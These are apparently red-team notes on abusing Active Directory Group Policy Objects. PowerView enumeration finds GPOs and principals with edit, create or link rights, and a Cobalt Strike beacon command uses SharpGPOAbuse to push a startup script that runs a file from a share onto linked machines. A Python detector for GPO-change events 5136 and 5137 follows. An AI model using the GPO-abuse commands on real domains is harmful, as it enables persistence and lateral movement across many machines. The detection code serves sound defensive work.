A Group Policy Object (GPO) is a collection of Group Policy settings. Each GPO holds settings that are applied to the OUs it is linked to. GPOs can be created by domain admins and by those groups or users who have been delegated the right (such delegated principals are usually only able to configure GPOs that apply to selected OUs). After creation, a GPO must be linked to an OU to take effect.

Modify

Requirements

Look for GPOs with special ACLs:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }

Acquire GPO information:

# Get its name and location on filesystem
Get-DomainGPO -Identity "CN={[guid]},CN=Policies,CN=System,[domain-dn]" | select displayName, gpcFileSysPath

# Get linked OU
Get-DomainOU -GPLink "{[guid]}" | select distinguishedName

To modify a GPO, edit the files under \\[machine-fqdn]\SysVol\[domain-fqdn]\Policies\{[guid]} or use a tool like SharpGPOAbuse:

beacon> execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\[domain]\[share]\[file-name]" --GPOName "[GPO to modify]"
# wait for a GPO update (or run gpupdate /force) and reboot

Create

See: registry autorun via GPO

To check if RSAT tooling is installed on this machine:

Get-Module -ListAvailable -Name GroupPolicy | select -expand ExportedCommands

Create a GPO:

New-GPO -Name "[GPO Name]"

Look for principals allowed to create GPOs (PowerView):

Get-DomainObjectAcl -Identity "CN=Policies,CN=System,[domain-dn]" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -match "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

Look for principals allowed to link GPOs to OUs (PowerView):

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl
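As an added defensive counterpart to the enumeration above (this is example code, not part of the original notes): the same three actions these rights allow (creating a GPO, editing its groupPolicyContainer, linking it to an OU) show up in the Security log as events 5137 and 5136 once "Audit Directory Service Changes" is enabled and a SACL exists on CN=Policies,CN=System. The allow-list, the sample records and the GPO GUIDs below are constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Attributes on a groupPolicyContainer whose change means the GPO's content was edited
# (versionNumber increments on every edit; the extension-name attributes record which CSEs apply).
GPO_EDIT_ATTRS = {"versionNumber", "gPCMachineExtensionNames", "gPCUserExtensionNames",
                  "gPCFileSysPath", "nTSecurityDescriptor"}
# Assumption: accounts the AD team expects to create, edit or link GPOs (sample allow-list).
EXPECTED_EDITORS = {"gpo-admin-svc"}
GUID_RE = re.compile(r"CN=(\{[0-9A-F-]{36}\}),CN=Policies,CN=System", re.I)

@dataclass
class Finding:
    kind: str                 # gpo-created | gpo-modified | gpo-linked
    subject: str
    object_dn: str
    gpo_guid: Optional[str]   # the {guid} used in the Get-DomainGPO / Get-DomainOU lookups
    severity: str             # "high" when the actor is not an expected editor

def classify(event: dict) -> Optional[Finding]:
    """Map one Security event (5136 object modified / 5137 object created) to a GPO finding."""
    eid, obj_class = event["EventID"], event["ObjectClass"]
    attr = event.get("AttributeLDAPDisplayName", "")
    if eid == 5137 and obj_class == "groupPolicyContainer":
        kind = "gpo-created"
    elif eid == 5136 and obj_class == "groupPolicyContainer" and attr in GPO_EDIT_ATTRS:
        kind = "gpo-modified"
    elif eid == 5136 and obj_class in ("organizationalUnit", "domainDNS") and attr == "gPLink":
        kind = "gpo-linked"   # scope change: a GPO was linked to or unlinked from this OU/domain
    else:
        return None
    m = GUID_RE.search(event["ObjectDN"])
    subject = event["SubjectUserName"].lower()
    severity = "info" if subject in EXPECTED_EDITORS else "high"
    return Finding(kind, subject, event["ObjectDN"], m.group(1) if m else None, severity)

def scan(events: list) -> list:
    return [f for f in (classify(e) for e in events) if f]

# Constructed sample records (field names as in the 5136/5137 EventData block; GUIDs are placeholders).
GPO_DN = "CN={AAAAAAAA-0000-0000-0000-000000000001},CN=Policies,CN=System,DC=corp,DC=local"
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "gpo-admin-svc", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": GPO_DN, "AttributeLDAPDisplayName": "versionNumber"},
    {"EventID": 5136, "SubjectUserName": "bob", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": GPO_DN, "AttributeLDAPDisplayName": "gPCMachineExtensionNames"},
    {"EventID": 5136, "SubjectUserName": "bob", "ObjectClass": "organizationalUnit",
     "ObjectDN": "OU=Workstations,DC=corp,DC=local", "AttributeLDAPDisplayName": "gPLink"},
    {"EventID": 5137, "SubjectUserName": "gpo-admin-svc", "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={AAAAAAAA-0000-0000-0000-000000000002},CN=Policies,CN=System,DC=corp,DC=local"},
    {"EventID": 5136, "SubjectUserName": "bob", "ObjectClass": "user",
     "ObjectDN": "CN=bob,CN=Users,DC=corp,DC=local", "AttributeLDAPDisplayName": "description"},
]
```

A "high" gpo-modified finding is the point to pull the GPO's gpcFileSysPath and diff the SysVol folder against the last known-good copy; a "high" gpo-linked finding should be checked against the gPLink principals found above.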